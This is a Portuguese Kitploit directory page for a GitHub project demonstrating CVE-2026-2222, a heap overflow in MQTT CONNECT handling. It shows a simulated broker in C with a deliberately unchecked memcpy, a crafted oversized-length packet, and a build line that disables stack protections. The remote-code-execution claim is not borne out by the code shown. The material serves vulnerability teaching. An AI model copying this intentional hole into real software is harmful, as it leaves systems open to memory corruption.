Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow — Demonstra o heap overflow CVE-2026-2222 no tratamento de pacotes CONNECT do MQTT com um broker vulnerável simulado e código de exploit de prova de conceito para execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow
Segurança IoTAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoExploração de Binários
GitHubgeorge0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow

CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow

Demonstra o heap overflow CVE-2026-2222 no tratamento de pacotes CONNECT do MQTT com um broker vulnerável simulado e código de exploit de prova de conceito para execução remota de código.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 1 mêsAinda não revisado

CVE-2026-2222 – Estouro de Heap no Pacote CONNECT do Broker MQTT

Código do Programa (C + Python)

root@kitploit:~
// mqtt_broker_sim.c - Simulated vulnerable MQTT broker
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct mqtt_connect {
    char protocol_name[8];
    uint8_t protocol_level;
    uint8_t flags;
    uint16_t keepalive;
    // remaining length field misinterpreted
};

void process_connect(uint8_t *packet, size_t len) {
    // Assume we've parsed fixed header: remaining length = (packet[1] & 0x7F) + ...
    // For demo, we read a 2-byte "remaining length" from packet[1:3] and allocate that many bytes,
    // then copy payload without proper bounds.
    uint16_t remaining_length = (packet[1] << 8) | packet[2]; // should be encoded as variable length, but we misuse
    printf("Allocating %d bytes\n", remaining_length);
    char *buffer = malloc(remaining_length); // if remaining_length is crafted to wrap, small allocation
    // copy payload from packet+3 for remaining_length bytes -> heap overflow if remaining_length > len-3
    memcpy(buffer, packet+3, remaining_length); // overflow
    // process...
    free(buffer);
}

int main() {
    // Crafted malicious packet: remaining_length = 0xFFFF (65535) but actual packet size small
    uint8_t evil[] = {0x10, 0xFF, 0xFF, 0x00, 0x04, 'M','Q','T','T'}; // length 9
    process_connect(evil, sizeof(evil));
    return 0;
}

CVE-2026-2222 – Estouro de Heap no CONNECT do Broker MQTT

Severity: Critical

Visão Geral

Um estouro de inteiro na análise do campo de comprimento restante do pacote CONNECT do MQTT leva a um estouro de buffer na heap, permitindo a execução remota de código no broker.

Detalhes da Vulnerabilidade

  • Tipo: Estouro de inteiro / Estouro de buffer na heap
  • Impacto: Execução remota de código no broker MQTT, comprometendo todos os dispositivos IoT conectados.
  • Causa raiz: O broker decodifica o comprimento restante como um valor de 16 bits e o utiliza diretamente em uma alocação de memória e cópia, sem verificar o tamanho real do pacote.

Demonstração do Exploit

Compile e execute o broker vulnerável simulado:

root@kitploit:~
gcc mqtt_broker_sim.c -o mqtt_broker_sim -fno-stack-protector -z execstack
./mqtt_broker_sim
Baixar ferramenta